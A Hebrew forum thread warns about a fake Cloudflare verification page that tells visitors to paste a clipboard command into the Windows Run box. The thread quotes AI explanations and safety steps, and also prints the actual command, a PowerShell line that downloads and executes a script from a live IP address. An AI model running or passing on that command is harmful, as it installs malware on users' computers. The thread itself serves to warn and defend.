מידע שימושי זהירות! וירוס בתחפושת!

  • הוסף לסימניות
  • #1
ניסיתי להכנס לאתר של הרב אפרתי - נותן הכשרות
לאחר לחיצה על סימון - אתה לא רובוט...

הופתעתי מאוד לראות את זה:
1773765478164.png

נראה חשוד!

מאוד חשוד!!!

‫Gemini אמר​

אזהרה: מדובר בהונאה ובתוכנה זדונית (Malware)

התמונה שצירפת מציגה דף מזויף שמתחזה לשירות ההגנה Cloudflare, אך למעשה מדובר בשיטה להרצת קוד זדוני על המחשב שלך.

למה זה מסוכן?

ההוראות בתמונה מבקשות ממך לבצע רצף פעולות חריג מאוד:
  1. צירוף המקשים Win + R: פותח את חלון ה-"הפעלה" (Run) של ווינדוס, שמשמש להרצת פקודות מערכת.
  2. צירוף המקשים Ctrl + V: מדביק פקודה שהאתר העתיק ללוח הגזירים (Clipboard) שלך באופן אוטומטי ברגע שנכנסת לדף או לחצת על כפתור.
  3. לחיצה על OK: מריצה את הפקודה המודבקת.
מה קורה בפועל?ברגע שתלחץ על OK, המחשב יריץ פקודה (בדרך כלל פקודת PowerShell) שמורידה ומתקינה וירוס, תוכנת כופר או תוכנה לגניבת סיסמאות ופרטי בנק. אף שירות אימות לגיטימי (כמו Cloudflare) לא יבקש ממך להריץ פקודות ידניות בחלון ה-Run של המערכת.



מה עליך לעשות?

  • אל תבצע את ההוראות: אל תקיש על שום שילוב מקשים ואל תדביק דבר.
  • סגור את הלשונית מיד: צא מהאתר הזה ואל תחזור אליו.
  • סריקת וירוסים: מומלץ להריץ סריקה מלאה של האנטי-וירוס במחשב שלך (כמו Windows Defender או תוכנה מוכרת אחרת) ליתר ביטחון.
  • ניקוי היסטוריה: כדאי לנקות את הקבצים הזמניים והקוקיז בדפדפן.

בדקתי בלוח מה הפקודה שהוא רצה שאני אריץ במחשב....
זה הפקודה: powershell -c iex(irm 158.94.209.33 -UseBasicParsing) - סכנה! לא להריץ בשום אופן!!!!

תקראו טוב מה גיימני כותב שזה עושה למחשב שלכם...

זהירות! מדובר בתוכנה זדונית (Malware) ודאית.

הפקודה שהעתקת היא הוכחה חותכת לכך שמדובר בניסיון פריצה. בוא נפרק את הפקודה כדי שתבין בדיוק מה היא מנסה לעשות למחשב שלך:

  • powershell: מפעיל את ממשק הפקודות המתקדם של ווינדוס. לממשק זה יש הרשאות עמוקות לשינוי הגדרות מערכת.
  • iex (Invoke-Expression): פקודה שאומרת למחשב: "כל מה שתקבל בהמשך – תריץ אותו כקוד עכשיו".
  • irm (Invoke-RestMethod): פקודה להורדת תוכן מהאינטרנט.
  • 158.94.209.33: זוהי כתובת IP של שרת מרוחק (שאינו קשור ל-Cloudflare). הפקודה מנסה למשוך קובץ "תסריט" (Script) מהשרת הזה.
  • -UseBasicParsing: הוראה לדפדפן הפנימי להתעלם מבדיקות תאימות ולהריץ את הקוד במהירות.



מה המשמעות?

ברגע שהיית לוחץ על OK, המחשב שלך היה פונה לכתובת ה-IP הזו, מוריד קוד זדוני (כמו סוס טרויאני או תוכנת כופר) ומריץ אותו מיד ברקע, בלי שתראה חלון נוסף או אזהרה.

צעדים דחופים אם כבר הרצת את הפקודה:

  1. ניתוק מהאינטרנט: כבה את ה-Wi-Fi או נתק את כבל הרשת מיד כדי למנוע מהווירוס לשלוח מידע החוצה או להוריד רכיבים נוספים.
  2. סריקה במצב בטוח: הפעל את המחשב ב-"מצב בטוח" (Safe Mode) והרץ סריקה מלאה של אנטי-וירוס מעודכן.
  3. שינוי סיסמאות: ממכשיר אחר (טלפון או מחשב נקי), שנה סיסמאות לחשבונות רגישים (מייל, בנק, רשתות חברתיות).


אוסיף שבדקתי את הכתובת שהפקודה פונה אליה
באתר בדיקת כתובות אינטרנט - האם הן וירוס
הנה הקישור לבדיקה: https://www.virustotal.com/gui/url/bd5456fb856d9b4d0d4cea1c68edf7e1793e6a72fb9ac037f4f05d1bba65c18c
מוזמנים לראות את התוצאה....


מסקנה:

זהירות!!!
 
נערך לאחרונה ב:
  • הוסף לסימניות
  • #2
מקפיץ
 
  • הוסף לסימניות
  • #3
בגלל שזה וירוס שנפוץ מאוד - יש את אותו דבר בהמון מקומות שונים
ובכולם אותו עיקרון - אני מקפיץ שוב
ואני חושב שכדאי לשתף לאחרים - להציל מנזק
 
  • הוסף לסימניות
  • #4
 
  • הוסף לסימניות
  • #8
  • הוסף לסימניות
  • #11
מי שעשה מאוד חשוב למחוק קבצי TEMP
 
  • הוסף לסימניות
  • #12
  • הוסף לסימניות
  • #14
אי אפשר להוריד מאחורי הקלעים בדפדפנים מודרניים...
אני לא יודעת, אבל עובדה שרק נכנסתי לקישור דרך החיפוש גוגל במחשב של העבודה - ומייד התקשרו אלי אלה שמנטרים את הרשת להגיד שהם רואים קובץ זדוני... לא יודעת מה הם עשו עם זה, אבל עובדה שהם ראו
 
  • הוסף לסימניות
  • #17
מה זה נקרא מחוץ לדפדפן בעברית מדוברת?
"מחוץ לדפדפן" פירושו להפעיל תוכנה או אפליקציה באופן עצמאי ישירות על המחשב או הטלפון, מבלי להיכנס אליה דרך אתר אינטרנט.
 
  • הוסף לסימניות
  • #19
אני לא יודעת, אבל עובדה שרק נכנסתי לקישור דרך החיפוש גוגל במחשב של העבודה - ומייד התקשרו אלי אלה שמנטרים את הרשת להגיד שהם רואים קובץ זדוני... לא יודעת מה הם עשו עם זה, אבל עובדה שהם ראו
הקובץ הזדוני הוא האתר עצמו (שכן יורד למחשב, אבל לא יכול להריץ שום דבר מחוץ לדפדפן)
 
  • הוסף לסימניות
  • #20

פרוגבוט

תוכן שיווקי
פרסומת

פוסטים חדשים שאולי לא קראת....

סיכום אירועים: איראן בלהבות - מהמחאות ועד לסף עימות עולמי

הרקע וההתפרצות (סוף דצמבר 2025):

המחאות החלו ב-28 בדצמבר 2025 בטהראן, על רקע משבר כלכלי חריף וצניחה חדה בערך הריאל. מה שהחל כזעקת סוחרים ואזרחים על יוקר המחיה, הפך במהירות לגל הפגנות חסר תקדים ב-187 ערים הקורא להפלת המשטר.


הטבח והחשכת המידע (ינואר 2026):
  • דיכוי אלים: המשטר האיראני הגיב באכזריות יוצאת דופן. לפי נתוני ארגון זכויות האדם HRANA, נכון ל-23 בינואר, מספר ההרוגים המאומת עומד על למעלה מ-5,000 בני אדם, בהם 4,716 מפגינים ועשרות ילדים.
    יש דיווחים לא מאומתים מצד האופוזיציה האיראנית על מעל 60,000 הרוגים!

  • מעצרים המוניים: למעלה מ-26,500 בני אדם נעצרו, וקיים חשש כבד להוצאות להורג המוניות בבתי הכלא.

  • חסימת אינטרנט: החל מה-8 בינואר הוטל מצור דיגיטלי כמעט מוחלט על המדינה כדי למנוע זליגת תיעודים מהטבח.

המעורבות האמריקנית - "הארמדה של טראמפ":
הנשיא טראמפ, שחזר והזהיר את טהראן מפני המשך הטבח, הכריז ב-22 בינואר כי "ארמדה" אמריקנית (צי ספינות מלחמה, כולל נושאת המטוסים אברהם לינקולן) עושה את דרכה למפרץ הפרסי. טראמפ הבהיר כי ארה"ב בוחנת אפשרויות תקיפה ישירות נגד מטרות שלטוניות אם לא ייפסק הדיכוי. ולאחר הדלפות על ממדי הטבח, הכריז "העזרה בדרך".


הזווית הישראלית והאזורית:
  • כוננות שיא: ישראל נמצאת בדריכות עליונה מחשש שהסלמה אמריקנית תוביל לתגובה איראנית ישירה או באמצעות שלוחיה (פרוקסי).

  • איומי נתניהו: ראש הממשלה נתניהו הזהיר כי אם איראן תבצע "טעות" ותתקוף את ישראל, היא תפגוש עוצמה שטרם הכירה.

  • איומי טהראן: המשטר האיראני הודיע כי במקרה של תקיפה, בסיסים אמריקניים ויעדים בישראל יהיו "מטרות לגיטימיות".

באשכול זה נמשיך לעדכן סביב השעון בכל התפתחות, דיווחים מהשטח ופרשנויות ביטחוניות.

אולי מעניין אותך גם...

הצטרפות לניוזלטר

איזה כיף שהצטרפתם לניוזלטר שלנו!

מעכשיו, תהיו הראשונים לקבל את כל העדכונים, החדשות, ההפתעות בלעדיות, והתכנים הכי חמים שלנו בפרוג!

לוח מודעות

הפרק היומי

הפרק היומי! כל ערב פרק תהילים חדש. הצטרפו אלינו לקריאת תהילים משותפת!


תהילים פרק כג

אמִזְמוֹר לְדָוִד יי רֹעִי לֹא אֶחְסָר:בבִּנְאוֹת דֶּשֶׁא יַרְבִּיצֵנִי עַל מֵי מְנֻחוֹת יְנַהֲלֵנִי:גנַפְשִׁי יְשׁוֹבֵב יַנְחֵנִי בְמַעְגְּלֵי צֶדֶק לְמַעַן שְׁמוֹ:דגַּם כִּי אֵלֵךְ בְּגֵיא צַלְמָוֶת לֹא אִירָא רָע כִּי אַתָּה עִמָּדִי שִׁבְטְךָ וּמִשְׁעַנְתֶּךָ הֵמָּה יְנַחֲמֻנִי:התַּעֲרֹךְ לְפָנַי שֻׁלְחָן נֶגֶד צֹרְרָי דִּשַּׁנְתָּ בַשֶּׁמֶן רֹאשִׁי כּוֹסִי רְוָיָה:ואַךְ טוֹב וָחֶסֶד יִרְדְּפוּנִי כָּל יְמֵי חַיָּי וְשַׁבְתִּי בְּבֵית יי לְאֹרֶךְ יָמִים:
נקרא  8  פעמים
למעלה